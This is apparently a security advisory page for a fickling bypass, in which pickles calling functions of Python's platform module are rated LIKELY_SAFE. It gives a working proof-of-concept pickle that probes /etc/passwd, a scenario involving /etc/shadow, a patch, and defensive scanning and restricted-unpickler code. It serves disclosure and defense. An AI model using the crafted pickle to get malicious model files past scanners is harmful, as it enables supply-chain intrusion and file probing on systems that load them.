GHSA-5cxw-w2xg-2m8h: fickling: Allowlist Bypass evades input filtering

GHSA-5cxw-w2xg-2m8h MEDIUM
Published March 13, 2026
CISO Take

If your ML pipeline uses fickling to gate pickle file safety checks, upgrade to v0.1.10 immediately — all prior versions give a false LIKELY_SAFE verdict for pickles that invoke subprocess or read arbitrary files via the platform module. This is a defense bypass in your security tooling itself, not just a vulnerable library, meaning your pickle safety gate is silent while malicious model files pass through. Patch fickling now and re-scan any pickle artifacts ingested since it was deployed.

Risk Assessment

Medium-High within AI/ML contexts. The raw CVSS is not yet scored, but the operational risk is elevated because fickling is specifically positioned as a security control for detecting malicious pickles — a false negative in a security scanner is categorically worse than a vulnerability in a general-purpose library. Exploitability is moderate: requires crafting a valid pickle using stdlib platform functions, achievable by anyone with Python and pickle knowledge. Impact is constrained (no arbitrary shell injection due to list-based subprocess call), but file existence probing and type disclosure are meaningful in multi-tenant or CI/CD environments where model files are ingested from untrusted sources.
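To see why the list-form subprocess call bounds the impact, note that argv elements are passed to the child process verbatim with no shell parsing, so metacharacters in an attacker-controlled path are inert. A minimal, self-contained illustration (using the Python interpreter itself as the child rather than the `file` utility, for portability):

```python
import subprocess
import sys

# With a list argv, each element reaches the child as one literal argument;
# no shell ever parses it, so ';', '$(...)', '&&' etc. have no effect.
hostile = "/etc/passwd; touch /tmp/pwned"
out = subprocess.check_output(
    [sys.executable, "-c", "import sys; print(sys.argv[1])", hostile],
    text=True,
)
print(out.strip())  # the hostile string, echoed verbatim; nothing was executed
```

This is exactly the situation in `platform._syscmd_file`: the attacker chooses which path the `file` command inspects, but cannot inject additional commands or flags.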

Affected Systems

Package    Ecosystem    Vulnerable Range    Patched
fickling   pip          <= 0.1.9            0.1.10

Do you use fickling? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

Recommended Action

6 steps
  1. PATCH

    Upgrade fickling to v0.1.10 immediately (pip install "fickling>=0.1.10" — quote the specifier so the shell does not treat >= as a redirection).

  2. RE-SCAN: Re-run fickling against all pickle artifacts in your model registry or artifact store ingested since fickling was first deployed.

  3. AUDIT

    Check whether any pipeline trusts fickling's LIKELY_SAFE verdict as the sole gate — add secondary controls (sandboxed execution, allowlist-only imports via a restricted unpickler).

  4. DETECT

    Search pickle files for platform module references (a ShortBinUnicode 'platform' string followed by a StackGlobal opcode) using fickling's opcode introspection or YARA.

  5. COMPENSATING CONTROL

    Until patched, load pickles inside a sandboxed subprocess and restrict imports with a RestrictedUnpickler, so that a scanner bypass still has a limited blast radius.

  6. MONITOR

    Alert on subprocess spawning from model-loading processes in production — an invocation of the file command from a model server is anomalous.
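The DETECT step above can be approximated without fickling at all: the stdlib pickletools module streams opcodes without executing the pickle, so it can flag any import of the platform module. A rough sketch covering both the GLOBAL (protocol ≤ 2) and STACK_GLOBAL (protocol ≥ 4) import paths; a production scanner should also handle memo-based indirection:

```python
import io
import pickletools


def references_platform(data: bytes) -> bool:
    """Return True if the pickle imports anything from the `platform` module."""
    recent: list[str] = []  # last two string arguments pushed on the stack
    for opcode, arg, _pos in pickletools.genops(io.BytesIO(data)):
        if opcode.name in ("GLOBAL", "INST"):
            # pickletools renders the argument as "module name" in one string
            if isinstance(arg, str) and arg.partition(" ")[0] == "platform":
                return True
        elif opcode.name == "STACK_GLOBAL":
            # STACK_GLOBAL pops qualname, then module: the module is the
            # second-to-last string pushed before this opcode
            if len(recent) == 2 and recent[0] == "platform":
                return True
        elif isinstance(arg, str):
            recent = (recent + [arg])[-2:]
    return False
```

For example, `references_platform(pickle.dumps(platform.architecture, protocol=4))` is True, while a pickle of plain containers and numbers returns False. This is a coarse heuristic, not a replacement for upgrading fickling.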

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 9 - Risk management system for high-risk AI
ISO 42001
A.6.2.3 - AI system security testing A.8.4 - AI supply chain management
NIST AI RMF
GOVERN 1.7 - Processes for AI risk identification and mitigation are established MANAGE 2.4 - Residual risks are monitored and managed
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-5cxw-w2xg-2m8h?

If your ML pipeline uses fickling to gate pickle file safety checks, upgrade to v0.1.10 immediately — all prior versions give a false LIKELY_SAFE verdict for pickles that invoke subprocess or read arbitrary files via the platform module. This is a defense bypass in your security tooling itself, not just a vulnerable library, meaning your pickle safety gate is silent while malicious model files pass through. Patch fickling now and re-scan any pickle artifacts ingested since it was deployed.

Is GHSA-5cxw-w2xg-2m8h actively exploited?

No confirmed active exploitation of GHSA-5cxw-w2xg-2m8h has been reported, but organizations should still patch proactively.

How to fix GHSA-5cxw-w2xg-2m8h?

1. PATCH: Upgrade fickling to v0.1.10 immediately (pip install "fickling>=0.1.10").
2. RE-SCAN: Re-run fickling against all pickle artifacts in your model registry or artifact store ingested since fickling was first deployed.
3. AUDIT: Check whether any pipeline trusts fickling's LIKELY_SAFE verdict as the sole gate — add secondary controls (sandboxed execution, allowlist-only imports via a restricted unpickler).
4. DETECT: Search pickle files for platform module references (a ShortBinUnicode 'platform' string followed by a StackGlobal opcode) using fickling's opcode introspection or YARA.
5. COMPENSATING CONTROL: Until patched, load pickles inside a sandboxed subprocess and restrict imports with a RestrictedUnpickler, so that a scanner bypass still has a limited blast radius.
6. MONITOR: Alert on subprocess spawning from model-loading processes in production — an invocation of the file command from a model server is anomalous.

What systems are affected by GHSA-5cxw-w2xg-2m8h?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps pipelines, model registries, data preprocessing pipelines.

What is the CVSS score for GHSA-5cxw-w2xg-2m8h?

No CVSS score has been assigned yet.

Technical Details

NVD Description

# Our assessment

We added `platform` to the blocklist of unsafe modules (https://github.com/trailofbits/fickling/commit/351ed4d4242b447c0ffd550bb66b40695f3f9975). It was not possible to inject extra arguments to `file` without first monkey-patching `platform._follow_symlinks` with the pickle, as it always returns an absolute path. We independently hardened it with https://github.com/trailofbits/fickling/commit/b9e690c5a57ee9cd341de947fc6151959f4ae359 to reduce the risk of obtaining direct module references while evading detection.

https://github.com/python/cpython/blob/6d1e9ceed3e70ebc39953f5ad4f20702ffa32119/Lib/platform.py#L687-L695

```python
target = _follow_symlinks(target)

# "file" output is locale dependent: force the usage of the C locale
# to get deterministic behavior.
env = dict(os.environ, LC_ALL='C')

try:
    # -b: do not prepend filenames to output lines (brief mode)
    output = subprocess.check_output(['file', '-b', target],
                                     stderr=subprocess.DEVNULL,
                                     env=env)
```

# Original report

## Summary

A crafted pickle invoking `platform._syscmd_file`, `platform.architecture`, or `platform.libc_ver` passes `check_safety()` with `Severity.LIKELY_SAFE` and zero findings. During `fickling.loads()`, these functions invoke `subprocess.check_output` with attacker-controlled arguments or read arbitrary files from disk.

**Clarification:** The subprocess call uses a list argument (`['file', '-b', target]`), not `shell=True`, so the attacker controls the file path argument to the `file` command, not the command itself. The impact is subprocess invocation with attacker-controlled arguments and information disclosure (file type probing), not arbitrary command injection.

## Affected versions

`<= 0.1.9` (verified on upstream HEAD as of 2026-03-04)

## Non-duplication check against published Fickling GHSAs

No published advisory covers `platform` module false-negative bypass. This follows the same structural pattern as GHSA-5hwf-rc88-82xm (missing modules in `UNSAFE_IMPORTS`) but covers a distinct set of functions.

## Root cause

1. `platform` not in `UNSAFE_IMPORTS` denylist.
2. `OvertlyBadEvals` skips calls imported from stdlib modules.
3. `UnusedVariables` heuristic neutralized by making call result appear used (`SETITEMS` path).

## Reproduction (clean upstream)

```python
from unittest.mock import patch

import fickling
import fickling.fickle as op
from fickling.fickle import Pickled
from fickling.analysis import check_safety

pickled = Pickled([
    op.Proto.create(4),
    op.ShortBinUnicode('platform'),
    op.ShortBinUnicode('_syscmd_file'),
    op.StackGlobal(),
    op.ShortBinUnicode('/etc/passwd'),
    op.TupleOne(),
    op.Reduce(),
    op.Memoize(),
    op.EmptyDict(),
    op.ShortBinUnicode('init'),
    op.ShortBinUnicode('x'),
    op.SetItem(),
    op.Mark(),
    op.ShortBinUnicode('trace'),
    op.BinGet(0),
    op.SetItems(),
    op.Stop(),
])

results = check_safety(pickled)
print(results.severity.name, len(results.results))  # LIKELY_SAFE 0

with patch('subprocess.check_output', return_value=b'ASCII text') as mock_sub:
    fickling.loads(pickled.dumps())

print('subprocess called?', mock_sub.called)  # True
print('args:', mock_sub.call_args[0])         # (['file', '-b', '/etc/passwd'],)
```

Additional affected functions (same pattern):

- `platform.architecture('/etc/passwd')` — calls `_syscmd_file` internally
- `platform.libc_ver('/etc/passwd')` — opens and reads arbitrary file contents

## Minimal patch diff

```diff
--- a/fickling/fickle.py
+++ b/fickling/fickle.py
@@
+    "platform",
```

## Validation after patch

- Same PoC flips to `LIKELY_OVERTLY_MALICIOUS`
- `fickling.loads` raises `UnsafeFileError`
- `subprocess.check_output` is not called

## Impact

- **False-negative verdict:** `check_safety()` returns `LIKELY_SAFE` with zero findings for a pickle that invokes a subprocess with attacker-controlled arguments.
- **Subprocess invocation:** `platform._syscmd_file` calls `subprocess.check_output(['file', '-b', target])` where `target` is attacker-controlled. The `file` command reads file headers and returns type information, enabling file existence and type probing.
- **File read:** `platform.libc_ver` opens and reads chunks of an attacker-specified file path.

Exploitation Scenario

An adversary submits a crafted PyTorch or scikit-learn model file to a shared model registry or MLOps platform. The pickle payload invokes platform._syscmd_file('/etc/passwd') or platform.libc_ver('/etc/shadow') via StackGlobal opcodes. The platform's security controls include a fickling pre-upload scan, which returns LIKELY_SAFE with zero findings. The model is approved, stored, and later loaded by downstream consumers. Upon loading, the file command is executed with the attacker-controlled path, returning file type metadata (existence confirmation, ASCII/binary classification) via the return value of fickling.loads(). In an exfiltration variant, the attacker chains this with a callback mechanism embedded in the pickle to leak the file content. In a supply chain variant targeting CI/CD, the malicious model file is committed to a model repository, scanned as safe, and deployed to production inference infrastructure.
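The layered defense this scenario calls for — never trusting a scanner verdict alone — can be sketched with the stdlib restricted-unpickler pattern: subclass pickle.Unpickler and permit only an explicit set of imports. The allowlist below is illustrative; a real deployment would enumerate exactly the classes its model format needs (e.g. torch storage types):

```python
import io
import pickle

# Illustrative allowlist of (module, qualname) pairs the unpickler may import.
# Everything else, including platform._syscmd_file, is rejected before load.
_ALLOWED = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) not in _ALLOWED:
            raise pickle.UnpicklingError(
                f"import of {module}.{name} is not allowed"
            )
        return super().find_class(module, name)


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads with an import allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers unpickle normally (`restricted_loads(pickle.dumps({"weights": [1.0]}))` succeeds), while any pickle that tries to import from the platform module raises UnpicklingError at load time, regardless of what a scanner said about the file.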

Timeline

Published
March 13, 2026
Last Modified
March 13, 2026
First Seen
March 24, 2026

Related Vulnerabilities